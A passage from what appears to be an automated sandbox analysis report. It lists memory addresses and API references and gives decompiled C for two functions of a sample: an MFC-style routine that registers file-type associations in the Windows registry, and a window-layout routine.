                  0x00411518
                  0x0041151b
                  0x0041152f
                  0x00411530
                  0x00000000
                  0x00411530
                  0x00411523
                  0x00411524
                  0x00411527
                  0x00000000
                  0x00000000
                  0x00411536
                  0x0041142d
                  0x0041142d
                  0x0041142f
                  0x00000000
                  0x00000000
                  0x0041153c
                  0x0041153d
                  0x00411540
                  0x00411542
                  0x00000000
                  0x00000000
                  0x004112ea
                  0x004112ed
                  0x004112f0
                  0x004112f3
                  0x004112f4
                  0x004112f4
                  0x00000000
                  0x00000000
                  0x00411549
                  0x0041154c
                  0x0041154d
                  0x004114ff
                  0x004114ff
                  0x00411500
                  0x0041148a
                  0x0041148a
                  0x00000000
                  0x00000000
                  0x00411552
                  0x00411555
                  0x00411558
                  0x0041155b
                  0x00411465
                  0x00411465
                  0x00411466
                  0x00411469
                  0x00411469
                  0x0041146b
                  0x00000000
                  0x00000000
                  0x00411561
                  0x00411564
                  0x00411567
                  0x0041156a
                  0x0041156b
                  0x0041156f
                  0x00411572
                  0x00411573
                  0x00411577
                  0x00411578
                  0x0041157a
                  0x0041157c
                  0x00411130
                  0x00411130
                  0x00411132
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00411584
                  0x00411587
                  0x0041158a
                  0x0041158d
                  0x0041158e
                  0x00411592
                  0x00411595
                  0x00411596
                  0x0041159a
                  0x0041159b
                  0x0041159d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004115a4
                  0x004115a6
                  0x004115a8
                  0x004115ab
                  0x004115ad
                  0x00000000
                  0x00000000
                  0x004112d4
                  0x004112d4
                  0x004112db
                  0x004112e0
                  0x004112e0
                  0x00000000
                  0x00000000
                  0x004115b9
                  0x00411320
                  0x00411320
                  0x00411641
                  0x00411641
                  0x00000000
                  0x00000000
                  0x004115c9
                  0x00000000
                  0x00000000
                  0x004115cf
                  0x004115d3
                  0x00000000
                  0x00000000
                  0x004115dd
                  0x004115e0
                  0x004115e1
                  0x004115e3
                  0x004115e6
                  0x004115e8
                  0x004115ee
                  0x004115ef
                  0x004115ef
                  0x004115f4
                  0x004115f8
                  0x00000000
                  0x00000000
                  0x00411607
                  0x0041160b
                  0x0041144a
                  0x0041144a
                  0x00411644
                  0x00411644
                  0x00411646
                  0x00000000
                  0x00000000
                  0x00411611
                  0x00411614
                  0x00411617
                  0x0041161a
                  0x0041161b
                  0x0041161f
                  0x00411622
                  0x00411623
                  0x004115fd
                  0x004115fd
                  0x00000000
                  0x00000000
                  0x00411629
                  0x0041162c
                  0x0041162f
                  0x00411632
                  0x00411633
                  0x00411637
                  0x0041163a
                  0x0041163b
                  0x004115fe
                  0x004115fe
                  0x00411600
                  0x00000000
                  0x00000000
                  0x00411277
                  0x004112c5
                  0x004112c8
                  0x004112c8
                  0x004112c8
                  0x004112cf
                  0x00000000
                  0x004112cf
                  0x004111f7
                  0x004111f9
                  0x004111fc
                  0x00000000
                  0x00000000
                  0x004111fe
                  0x00411204
                  0x00411207
                  0x0041120c
                  0x0041120e
                  0x00000000
                  0x00000000
                  0x00411214
                  0x0041121b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041121d
                  0x00411175
                  0x00411179
                  0x00000000
                  0x00000000
                  0x0041117b
                  0x00411181
                  0x0041118b
                  0x0041118b
                  0x00411191
                  0x0041119b
                  0x004111a1
                  0x004111a4
                  0x00000000
                  0x00000000
                  0x004111a6
                  0x004111b4
                  0x004111ba
                  0x004111bc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004111bc
                  0x00411193
                  0x00411199
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00411199
                  0x00411183
                  0x00411189
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041115a
                  0x00411165
                  0x0041116a
                  0x0041116c
                  0x00411102
                  0x00411102
                  0x00411666
                  0x00411666
                  0x0041166b
                  0x00411670
                  0x00411670
                  0x00411672
                  0x00411679
                  0x00411680
                  0x004112e2
                  0x004112e7
                  0x004112e7
                  0x00000000
                  0x0041116c
                  0x00411158
                  0x00411113
                  0x00411116
                  0x00411118
                  0x00000000
                  0x00000000
                  0x00411123
                  0x00411124
                  0x00411125
                  0x0041112a
                  0x00000000
                  0x0041112a
                  0x004110ec
                  0x004110f1
                  0x004110fc
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3
                  • String ID:
                  • API String ID: 431132790-0
                  • Opcode ID: 5581757f2f0f604347708a168a423f3eb4049c49235fdbbd8d9b4c50d54d3b50
                  • Instruction ID: 5d7ebeb502aa4d7c5eabf293e969739ff04ac9ecbf51b97e95c40226f3c0dc1a
                  • Opcode Fuzzy Hash: 5581757f2f0f604347708a168a423f3eb4049c49235fdbbd8d9b4c50d54d3b50
                  • Instruction Fuzzy Hash: 58F19270600219EFDB14DF55C880EFF7BA9EF08314F10851AFA19AB2A1D739D981DB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph
                  [Graph for the function at 0x00427ACD; legend: Executed / Not Executed. Graph image not preserved.]
                  C-Code - Quality: 90%
                  			E00427ACD(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t148;
                  				void* _t166;
                  				void* _t177;
                  				intOrPtr _t179;
                  				intOrPtr _t182;
                  				intOrPtr _t192;
                  				intOrPtr _t195;
                  				void* _t197;
                  				intOrPtr _t198;
                  				intOrPtr _t200;
                  				intOrPtr _t204;
                  				intOrPtr _t205;
                  				intOrPtr _t208;
                  				intOrPtr _t211;
                  				intOrPtr _t219;
                  				intOrPtr _t222;
                  				intOrPtr _t225;
                  				intOrPtr _t230;
                  				struct HICON__* _t239;
                  				void* _t240;
                  				intOrPtr _t247;
                  				intOrPtr _t248;
                  				void* _t276;
                  				void* _t277;
                  				void* _t294;
                  				intOrPtr* _t327;
                  				intOrPtr _t328;
                  				char* _t329;
                  				void* _t330;
                  				void* _t332;
                  				intOrPtr _t333;
                  				intOrPtr _t334;
                  				char* _t335;
                  				struct HICON__* _t336;
                  				void* _t338;
                  				void* _t339;
                  				void* _t340;
                  				intOrPtr _t342;
                  
                  				_t340 = __eflags;
                  				_t325 = __edx;
                  				_push(0x3c);
                  				E00431A9B(E0044C457, __ebx, __edi, __esi);
                  				_t332 = __ecx;
                  				E004014C0(_t338 - 0x2c, __edx);
                  				 *(_t338 - 4) =  *(_t338 - 4) & 0x00000000;
                  				E004014C0(_t338 - 0x14, __edx);
                  				 *(_t338 - 4) = 1;
                  				E004292E7(__ebx, __edx,  *((intOrPtr*)(E0041F363(__ebx, __edi, _t332, _t340) + 8)), _t338 - 0x2c); // executed
                  				_t148 =  *((intOrPtr*)(_t332 + 8));
                  				 *((intOrPtr*)(_t338 - 0x3c)) = _t148;
                  				 *(_t338 - 0x30) = 1;
                  				if(_t148 == 0) {
                  					L45:
                  					E004010B0( *((intOrPtr*)(_t338 - 0x14)) + 0xfffffff0, _t325);
                  					return E00431B73(E004010B0( &(( *(_t338 - 0x2c))[0xfffffffffffffff0]), _t325));
                  				} else {
                  					_t333 = _t332 + 4;
                  					_t342 = _t333;
                  					 *((intOrPtr*)(_t338 - 0x40)) = _t333;
                  					do {
                  						_t327 =  *((intOrPtr*)(E00408692(_t338 - 0x3c)));
                  						 *((intOrPtr*)(_t338 - 0x44)) = _t327;
                  						E00405562(_t338 - 0x24, _t342, _t338 - 0x2c);
                  						 *(_t338 - 4) = 2;
                  						E00405562(_t338 - 0x28, _t342, _t338 - 0x2c);
                  						 *(_t338 - 4) = 3;
                  						E00405562(_t338 - 0x20, _t342, _t338 - 0x2c);
                  						 *(_t338 - 4) = 4;
                  						E00405562(_t338 - 0x38, _t342, _t338 - 0x2c);
                  						_t247 =  *((intOrPtr*)(_t338 + 8));
                  						_t343 = _t247;
                  						if(_t247 != 0) {
                  							E004014C0(_t338 - 0x34, _t325);
                  							_t335 =  *(_t338 - 0x2c);
                  							 *(_t338 - 4) = 6;
                  							_t239 = ExtractIconA( *(E0041F363(_t247, _t327, _t335, _t343) + 8), _t335,  *(_t338 - 0x30)); // executed
                  							_t336 = _t239;
                  							_t240 = _t338 - 0x34;
                  							if(_t336 == 0) {
                  								E004015A0(_t240, ",%d", 0);
                  								_t339 = _t339 + 0xc;
                  							} else {
                  								E004015A0(_t240, ",%d",  *(_t338 - 0x30));
                  								_t339 = _t339 + 0xc;
                  								DestroyCursor(_t336);
                  							}
                  							E00405E21(_t338 - 0x38, _t325,  *((intOrPtr*)(_t338 - 0x34)),  *((intOrPtr*)( *((intOrPtr*)(_t338 - 0x34)) - 0xc)));
                  							E004010B0( *((intOrPtr*)(_t338 - 0x34)) - 0x10, _t325);
                  						}
                  						E004014C0(_t338 - 0x18, _t325);
                  						E004014C0(_t338 - 0x10, _t325);
                  						E004014C0(_t338 - 0x1c, _t325);
                  						 *(_t338 - 4) = 9;
                  						_t166 =  *((intOrPtr*)( *_t327 + 0x64))(_t338 - 0x10, 5);
                  						_t334 =  *((intOrPtr*)(_t338 - 0x38));
                  						if(_t166 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t338 - 0x10)) - 0xc)) == 0) {
                  							_t328 =  *((intOrPtr*)(_t338 - 0x24));
                  							_t248 =  *((intOrPtr*)(_t338 - 0x28));
                  							goto L42;
                  						} else {
                  							_push(6);
                  							_push(_t338 - 0x1c);
                  							if( *((intOrPtr*)( *_t327 + 0x64))() == 0) {
                  								E004056C2(_t247, _t338 - 0x1c, _t338 - 0x10);
                  							}
                  							_t177 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x10)),  *((intOrPtr*)(_t338 - 0x1c)), 0); // executed
                  							if(_t177 != 0) {
                  								__eflags = _t247;
                  								if(_t247 == 0) {
                  									L17:
                  									_t179 =  *((intOrPtr*)( *_t327 + 0x64))(_t338 - 0x14, 0);
                  									__eflags = _t179;
                  									if(_t179 == 0) {
                  										L22:
                  										_t329 = "ddeexec";
                  										_push(_t329);
                  										E004015A0(_t338 - 0x14, "%s\\shell\\open\\%s",  *((intOrPtr*)(_t338 - 0x10)));
                  										_t339 = _t339 + 0x10;
                  										_t182 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), "[open(\"%1\")]", 0); // executed
                  										__eflags = _t182;
                  										if(_t182 == 0) {
                  											L16:
                  											E004010B0( *((intOrPtr*)(_t338 - 0x1c)) + 0xfffffff0, _t325);
                  											E004010B0( *((intOrPtr*)(_t338 - 0x10)) + 0xfffffff0, _t325);
                  											E004010B0( *((intOrPtr*)(_t338 - 0x18)) + 0xfffffff0, _t325);
                  											_t288 = _t334 - 0x10;
                  											goto L13;
                  										}
                  										__eflags = _t247;
                  										if(_t247 == 0) {
                  											_push(" \"%1\"");
                  											_t294 = _t338 - 0x24;
                  											L28:
                  											E00405EC1(_t294);
                  											L29:
                  											_push("command");
                  											E004015A0(_t338 - 0x14, "%s\\shell\\open\\%s",  *((intOrPtr*)(_t338 - 0x10)));
                  											_t328 =  *((intOrPtr*)(_t338 - 0x24));
                  											_t339 = _t339 + 0x10;
                  											_t192 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), _t328, 0); // executed
                  											__eflags = _t192;
                  											if(_t192 != 0) {
                  												__eflags = _t247;
                  												_t248 =  *((intOrPtr*)(_t338 - 0x28));
                  												if(_t247 == 0) {
                  													L34:
                  													_t325 = _t338 - 0x18;
                  													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t338 - 0x44)))) + 0x64))(_t338 - 0x18, 4);
                  													_t195 =  *((intOrPtr*)(_t338 - 0x18));
                  													__eflags =  *((intOrPtr*)(_t195 - 0xc));
                  													if( *((intOrPtr*)(_t195 - 0xc)) == 0) {
                  														L42:
                  														E004010B0( *((intOrPtr*)(_t338 - 0x1c)) + 0xfffffff0, _t325);
                  														E004010B0( *((intOrPtr*)(_t338 - 0x10)) + 0xfffffff0, _t325);
                  														E004010B0( *((intOrPtr*)(_t338 - 0x18)) + 0xfffffff0, _t325);
                  														E004010B0(_t334 - 0x10, _t325);
                  														__eflags =  *((intOrPtr*)(_t338 - 0x20)) + 0xfffffff0;
                  														E004010B0( *((intOrPtr*)(_t338 - 0x20)) + 0xfffffff0, _t325);
                  														_t276 = _t248 - 0x10;
                  														L43:
                  														E004010B0(_t276, _t325);
                  														_t277 = _t328 - 0x10;
                  														goto L44;
                  													}
                  													 *((intOrPtr*)(_t338 - 0x44)) = 0x208;
                  													_t197 = E004014F0(_t338 - 0x14, 0x208);
                  													_push(_t338 - 0x44);
                  													_push(_t197);
                  													_push( *((intOrPtr*)(_t338 - 0x18)));
                  													_push(0x80000000); // executed
                  													_t198 = E00420018(_t248, _t325, _t328, _t334, __eflags); // executed
                  													 *((intOrPtr*)(_t338 - 0x48)) = _t198;
                  													E0040A356(_t338 - 0x14, 0xffffffff);
                  													__eflags =  *((intOrPtr*)(_t338 - 0x48));
                  													if( *((intOrPtr*)(_t338 - 0x48)) != 0) {
                  														L38:
                  														_t200 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x18)),  *((intOrPtr*)(_t338 - 0x10)), 0); // executed
                  														__eflags = _t200;
                  														if(_t200 != 0) {
                  															__eflags =  *((intOrPtr*)(_t338 + 8));
                  															if( *((intOrPtr*)(_t338 + 8)) != 0) {
                  																E004015A0(_t338 - 0x14, "%s\\ShellNew",  *((intOrPtr*)(_t338 - 0x18)));
                  																_t339 = _t339 + 0xc;
                  																E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), 0x44f0f5, "NullFile"); // executed
                  															}
                  														}
                  														goto L42;
                  													}
                  													_t204 =  *((intOrPtr*)(_t338 - 0x14));
                  													__eflags =  *((intOrPtr*)(_t204 - 0xc));
                  													if( *((intOrPtr*)(_t204 - 0xc)) == 0) {
                  														goto L38;
                  													}
                  													_t205 = E00409F00(_t338 - 0x14, _t325,  *((intOrPtr*)(_t338 - 0x10)));
                  													__eflags = _t205;
                  													if(_t205 != 0) {
                  														goto L42;
                  													}
                  													goto L38;
                  												}
                  												_push("command");
                  												E004015A0(_t338 - 0x14, "%s\\shell\\print\\%s",  *((intOrPtr*)(_t338 - 0x10)));
                  												_t339 = _t339 + 0x10;
                  												_t208 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), _t248, 0); // executed
                  												__eflags = _t208;
                  												if(_t208 == 0) {
                  													goto L42;
                  												}
                  												_push("command");
                  												E004015A0(_t338 - 0x14, "%s\\shell\\printto\\%s",  *((intOrPtr*)(_t338 - 0x10)));
                  												_t339 = _t339 + 0x10;
                  												_t211 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)),  *((intOrPtr*)(_t338 - 0x20)), 0); // executed
                  												__eflags = _t211;
                  												if(_t211 == 0) {
                  													goto L42;
                  												}
                  												goto L34;
                  											}
                  											E004010B0( *((intOrPtr*)(_t338 - 0x1c)) + 0xfffffff0, _t325);
                  											E004010B0( *((intOrPtr*)(_t338 - 0x10)) + 0xfffffff0, _t325);
                  											E004010B0( *((intOrPtr*)(_t338 - 0x18)) + 0xfffffff0, _t325);
                  											E004010B0(_t334 - 0x10, _t325);
                  											E004010B0( *((intOrPtr*)(_t338 - 0x20)) + 0xfffffff0, _t325);
                  											_t276 =  *((intOrPtr*)(_t338 - 0x28)) + 0xfffffff0;
                  											goto L43;
                  										}
                  										_push(_t329);
                  										E004015A0(_t338 - 0x14, "%s\\shell\\print\\%s",  *((intOrPtr*)(_t338 - 0x10)));
                  										_t339 = _t339 + 0x10;
                  										_t219 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), "[print(\"%1\")]", 0); // executed
                  										__eflags = _t219;
                  										if(_t219 == 0) {
                  											goto L16;
                  										}
                  										_push(_t329);
                  										E004015A0(_t338 - 0x14, "%s\\shell\\printto\\%s",  *((intOrPtr*)(_t338 - 0x10)));
                  										_t339 = _t339 + 0x10;
                  										_t222 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]", 0); // executed
                  										__eflags = _t222;
                  										if(_t222 == 0) {
                  											goto L16;
                  										}
                  										_t330 = " /dde";
                  										E00405EC1(_t338 - 0x24, _t330);
                  										E00405EC1(_t338 - 0x28, _t330);
                  										_push(_t330);
                  										L21:
                  										_t294 = _t338 - 0x20;
                  										goto L28;
                  									}
                  									_t225 =  *((intOrPtr*)(_t338 - 0x14));
                  									__eflags =  *((intOrPtr*)(_t225 - 0xc));
                  									if( *((intOrPtr*)(_t225 - 0xc)) == 0) {
                  										goto L22;
                  									}
                  									E00405EC1(_t338 - 0x24, " \"%1\"");
                  									__eflags = _t247;
                  									if(_t247 == 0) {
                  										goto L29;
                  									}
                  									E00405EC1(_t338 - 0x28, " /p \"%1\"");
                  									_push(" /pt \"%1\" \"%2\" \"%3\" \"%4\"");
                  									goto L21;
                  								}
                  								E004015A0(_t338 - 0x14, "%s\\DefaultIcon",  *((intOrPtr*)(_t338 - 0x10)));
                  								_t339 = _t339 + 0xc;
                  								_t230 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), _t334, 0); // executed
                  								__eflags = _t230;
                  								if(_t230 != 0) {
                  									goto L17;
                  								}
                  								goto L16;
                  							} else {
                  								E004010B0( *((intOrPtr*)(_t338 - 0x1c)) + 0xfffffff0, _t325);
                  								E004010B0( *((intOrPtr*)(_t338 - 0x10)) + 0xfffffff0, _t325);
                  								E004010B0( *((intOrPtr*)(_t338 - 0x18)) + 0xfffffff0, _t325);
                  								_t288 =  *((intOrPtr*)(_t338 - 0x38)) + 0xfffffff0;
                  								L13:
                  								E004010B0(_t288, _t325);
                  								E004010B0( *((intOrPtr*)(_t338 - 0x20)) + 0xfffffff0, _t325);
                  								E004010B0( *((intOrPtr*)(_t338 - 0x28)) + 0xfffffff0, _t325);
                  								_t277 =  *((intOrPtr*)(_t338 - 0x24)) + 0xfffffff0;
                  								goto L44;
                  							}
                  						}
                  						L44:
                  						 *(_t338 - 4) = 1;
                  						E004010B0(_t277, _t325);
                  						 *(_t338 - 0x30) =  *(_t338 - 0x30) + 1;
                  					} while ( *((intOrPtr*)(_t338 - 0x3c)) != 0);
                  					goto L45;
                  				}
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00427AD4
                    • Part of subcall function 004292E7: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00429312
                    • Part of subcall function 004292E7: GetShortPathNameA.KERNEL32(?,00000000,00000104), ref: 00429329
                  • ExtractIconA.SHELL32(?,?,00000001), ref: 00427B90
                  • DestroyCursor.USER32(00000000), ref: 00427BB1
                    • Part of subcall function 00427206: lstrlenA.KERNEL32(?), ref: 00427214
                    • Part of subcall function 00427206: lstrlenA.KERNEL32(?,80000000,?,?), ref: 0042724D
                    • Part of subcall function 00427206: RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,?,00000001), ref: 00427262
                    • Part of subcall function 00427206: RegCloseKey.ADVAPI32(?), ref: 0042726D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Namelstrlen$CloseCursorDestroyExtractFileH_prolog3IconModulePathShortValue
                  • String ID: "%1"$ /dde$ /p "%1"$ /pt "%1" "%2" "%3" "%4"$%s\DefaultIcon$%s\ShellNew$%s\shell\open\%s$%s\shell\print\%s$%s\shell\printto\%s$,%d$NullFile$[open("%1")]$[print("%1")]$[printto("%1","%2","%3","%4")]$command$ddeexec
                  • API String ID: 519677498-4043335175
                  • Opcode ID: fa335e7d5f54601939ab60626600fbe5f1b4d029b047e4cf50c6b1b1f199abd5
                  • Instruction ID: 9143f19bdfc8b7c6ecc2443052c1ae3c958a6745bc1d14e11510287793223560
                  • Opcode Fuzzy Hash: fa335e7d5f54601939ab60626600fbe5f1b4d029b047e4cf50c6b1b1f199abd5
                  • Instruction Fuzzy Hash: FFE17D31A04119ABCB14EBA5DC92FBFB774AF14318F64022AF521772E2DB385944CB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  [Figure: control-flow graph of function 00413B62; legend: Executed / Not Executed]
                  C-Code - Quality: 88%
                  			E00413B62(intOrPtr* __ecx, void* __edx, signed int* _a4, intOrPtr _a8, signed int _a12) {
                  				intOrPtr* _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				intOrPtr* _v24;
                  				signed int _v28;
                  				intOrPtr _v32;
                  				signed int _v36;
                  				void* _v40;
                  				signed int _v44;
                  				struct tagRECT _v64;
                  				struct tagRECT _v80;
                  				struct tagRECT _v96;
                  				signed int _v128;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t181;
                  				intOrPtr _t185;
                  				signed int _t187;
                  				intOrPtr _t192;
                  				intOrPtr _t193;
                  				signed int _t198;
                  				intOrPtr* _t199;
                  				signed int _t200;
                  				signed int _t202;
                  				signed int _t203;
                  				signed int _t205;
                  				signed int _t206;
                  				signed int _t211;
                  				signed int _t215;
                  				intOrPtr _t223;
                  				intOrPtr _t224;
                  				signed int _t229;
                  				signed int _t230;
                  				intOrPtr _t231;
                  				intOrPtr _t235;
                  				signed int* _t238;
                  				signed int _t240;
                  				signed int _t245;
                  				int _t246;
                  				int _t249;
                  				long _t252;
                  				intOrPtr _t253;
                  				signed int _t259;
                  				signed int* _t267;
                  				signed int _t268;
                  				void* _t275;
                  				intOrPtr* _t285;
                  				signed int _t286;
                  				signed int _t287;
                  				signed int _t288;
                  				signed int _t295;
                  				signed int* _t306;
                  				signed int _t313;
                  				signed int _t321;
                  				intOrPtr _t322;
                  				intOrPtr _t323;
                  				intOrPtr _t336;
                  				void* _t338;
                  				intOrPtr* _t340;
                  				intOrPtr* _t341;
                  				signed int _t349;
                  				signed int _t350;
                  				intOrPtr* _t351;
                  				signed int _t354;
                  
                  				_t291 = __ecx;
                  				_t285 = __ecx;
                  				_v8 = __ecx;
                  				_t357 = __ecx;
                  				if(__ecx != 0) {
                  					L2:
                  					E00421213(_a4, _a8, _a12);
                  					_t348 = _t285 + 0xb4;
                  					if(IsRectEmpty(_t285 + 0xb4) != 0) {
                  						_t291 = _t285;
                  						_t181 = E0040F898(_t285);
                  						__eflags = _t181;
                  						if(__eflags == 0) {
                  							goto L1;
                  						} else {
                  							GetClientRect( *(_t181 + 0x20),  &_v80);
                  							_t185 = _v80.right - _v80.left;
                  							_t295 = _v80.bottom - _v80.top;
                  							__eflags = _t295;
                  							goto L6;
                  						}
                  					} else {
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						 *((intOrPtr*)( *_t285 + 0x148))( &_v64, _a12);
                  						_t185 = _v64.right - _v64.left;
                  						_t295 = _v64.bottom - _v64.top;
                  						L6:
                  						_v28 = _t295;
                  						_v32 = _t185;
                  						if( *((intOrPtr*)(_t285 + 0xb0)) == 0) {
                  							_v128 = BeginDeferWindowPos( *(_t285 + 0xa4));
                  						} else {
                  							_v128 = _v128 & 0x00000000;
                  						}
                  						_t286 =  *0x466520; // 0x2
                  						_t349 =  *0x466524; // 0x2
                  						_t340 = _v8;
                  						_t187 = 0;
                  						_t350 =  ~_t349;
                  						_t287 =  ~_t286;
                  						_v44 = _t350;
                  						_v16 = 0;
                  						_v20 = 0;
                  						_v12 = 0;
                  						if( *((intOrPtr*)(_t340 + 0xa4)) <= 0) {
                  							L76:
                  							_t351 = _a4;
                  							if( *((intOrPtr*)(_t340 + 0xb0)) == _t187 && _v128 != _t187) {
                  								EndDeferWindowPos(_v128); // executed
                  							}
                  							SetRectEmpty( &_v96);
                  							 *((intOrPtr*)( *_t340 + 0x148))( &_v96, _a12);
                  							if(_a8 == 0 || _a12 == 0) {
                  								_t192 =  *_t351;
                  								if(_t192 != 0) {
                  									 *_t351 = _v96.left - _v96.right + _t192;
                  								}
                  							}
                  							if(_a8 == 0 || _a12 != 0) {
                  								_t193 =  *((intOrPtr*)(_t351 + 4));
                  								if(_t193 != 0) {
                  									 *((intOrPtr*)(_t351 + 4)) = _v96.top - _v96.bottom + _t193;
                  								}
                  							}
                  							return _t351;
                  						} else {
                  							do {
                  								_t341 = E00413638(_v8, _v12);
                  								_v24 = _t341;
                  								_t198 =  *(E0040B917(_v8 + 0x9c, _v12));
                  								if(_t341 == 0) {
                  									__eflags = _t198;
                  									if(_t198 != 0) {
                  										goto L74;
                  									}
                  									L61:
                  									__eflags = _v16;
                  									if(_v16 != 0) {
                  										__eflags = _a12;
                  										_t200 = _v16;
                  										_t306 = _a4;
                  										if(_a12 == 0) {
                  											_t287 = _t287 + _t200 -  *0x466520;
                  											_t202 =  *_t306;
                  											__eflags = _t202 - _t287;
                  											if(_t202 <= _t287) {
                  												_t202 = _t287;
                  											}
                  											 *_t306 = _t202;
                  											_t203 = _t306[1];
                  											__eflags = _t203 - _t350;
                  											if(_t203 <= _t350) {
                  												_t203 = _t350;
                  											}
                  											_t306[1] = _t203;
                  											_t354 =  *0x466524; // 0x2
                  											_t350 =  ~_t354;
                  											_v44 = _t350;
                  										} else {
                  											_t350 = _t350 + _t200 -  *0x466524;
                  											_t205 =  *_t306;
                  											__eflags = _t205 - _t287;
                  											_v44 = _t350;
                  											if(_t205 > _t287) {
                  												_t287 = _t205;
                  											}
                  											_t206 = _t306[1];
                  											__eflags = _t206 - _t350;
                  											 *_t306 = _t287;
                  											if(_t206 <= _t350) {
                  												_t206 = _t350;
                  											}
                  											_t306[1] = _t206;
                  											_t288 =  *0x466520; // 0x2
                  											_t287 =  ~_t288;
                  										}
                  										_t154 =  &_v16;
                  										 *_t154 = _v16 & 0x00000000;
                  										__eflags =  *_t154;
                  									}
                  									goto L74;
                  								}
                  								if( *((intOrPtr*)( *_t341 + 0x168))() == 0) {
                  									L58:
                  									__eflags = _v20;
                  									if(_v20 != 0) {
                  										goto L74;
                  									}
                  									L59:
                  									 *((intOrPtr*)( *_t341 + 0x16c))( &_v128);
                  									goto L74;
                  								}
                  								_t211 =  *(_t341 + 0x84);
                  								if((_t211 & 0x00000004) == 0 || (_t211 & 0x00000001) == 0) {
                  									asm("sbb eax, eax");
                  									_t215 = ( ~(_t211 & 0x0000a000) & 0xfffffffa) + 0x10;
                  									__eflags = _t215;
                  								} else {
                  									_t215 = 6;
                  								}
                  								 *((intOrPtr*)( *_t341 + 0x140))( &_v40, 0xffffffff, _t215);
                  								E0041335B( &_v64, _t287, _t350, _v40, _v36);
                  								GetWindowRect( *(_t341 + 0x20),  &_v80);
                  								E00422BFB(_v8,  &_v80);
                  								if(_a12 == 0) {
                  									_t223 = _v80.top;
                  									__eflags = _t223 - _v64.top;
                  									if(_t223 > _v64.top) {
                  										_t322 = _v8;
                  										__eflags =  *(_t322 + 0x98);
                  										if( *(_t322 + 0x98) == 0) {
                  											_t249 = _t223 - _v64.top;
                  											__eflags = _t249;
                  											OffsetRect( &_v64, 0, _t249);
                  										}
                  									}
                  									_t224 = _v64.bottom;
                  									_t313 = _v28;
                  									__eflags = _t224 - _t313;
                  									if(_t224 > _t313) {
                  										_t336 = _v8;
                  										__eflags =  *(_t336 + 0x98);
                  										if( *(_t336 + 0x98) == 0) {
                  											_t321 = _t313 - _t224 - _v64.top -  *0x466524;
                  											__eflags = _t321 - _t350;
                  											_t245 = _t321;
                  											if(_t321 <= _t350) {
                  												_t245 = _t350;
                  											}
                  											_t246 = _t245 - _v64.top;
                  											__eflags = _t246;
                  											OffsetRect( &_v64, 0, _t246);
                  										}
                  									}
                  									__eflags = _v20;
                  									if(_v20 == 0) {
                  										__eflags = _v64.top - _v28 -  *0x466524;
                  										if(_v64.top < _v28 -  *0x466524) {
                  											goto L51;
                  										}
                  										__eflags = _v12;
                  										if(_v12 <= 0) {
                  											goto L51;
                  										}
                  										_t238 = E0040B917(_v8 + 0x9c, _v12 - 1);
                  										__eflags =  *_t238;
                  										if( *_t238 != 0) {
                  											goto L37;
                  										}
                  										goto L51;
                  									} else {
                  										_t240 =  *0x466524; // 0x2
                  										_v20 = _v20 & 0x00000000;
                  										OffsetRect( &_v64, 0,  ~(_v64.top + _t240));
                  										L51:
                  										_t229 = EqualRect( &_v64,  &_v80);
                  										__eflags = _t229;
                  										if(_t229 == 0) {
                  											_t231 = _v8;
                  											__eflags =  *(_t231 + 0xb0);
                  											if( *(_t231 + 0xb0) == 0) {
                  												__eflags =  *(_t341 + 0x84) & 0x00000001;
                  												if(( *(_t341 + 0x84) & 0x00000001) == 0) {
                  													_t235 = _v24;
                  													__eflags =  *((intOrPtr*)(_t235 + 0x94)) + 0x94;
                  													asm("movsd");
                  													asm("movsd");
                  													asm("movsd");
                  													asm("movsd");
                  													_t341 = _t235;
                  												}
                  											}
